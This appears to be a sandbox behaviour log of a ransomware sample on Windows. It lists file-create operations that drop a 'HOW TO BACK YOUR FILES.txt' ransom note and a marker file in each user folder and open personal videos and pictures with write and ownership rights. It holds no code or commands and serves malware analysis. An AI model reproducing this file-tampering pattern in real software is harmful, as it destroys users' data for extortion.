Fn
Create C:\Users\Public\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Videos\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Pictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Music\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Downloads\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Desktop\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\AccountPictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ccn85Ai_.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\XZJL mjrH9\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\XZJL mjrH9\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Searches\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\Everywhere.search-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Searches\Indexed Locations.search-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Saved Games\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\C876_Q.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\ES -V29.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\FCOwn.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\FgcCERd5K.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\fJ6HL8oLrkhks9adl.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\gTPmnYJT.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\hsN3S _.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Hsyb4EvKfZDCo8.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\i2jPXe_5_EmayX-juQ.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\iJsVEnd5y-jq2.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\iKlWqFav.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
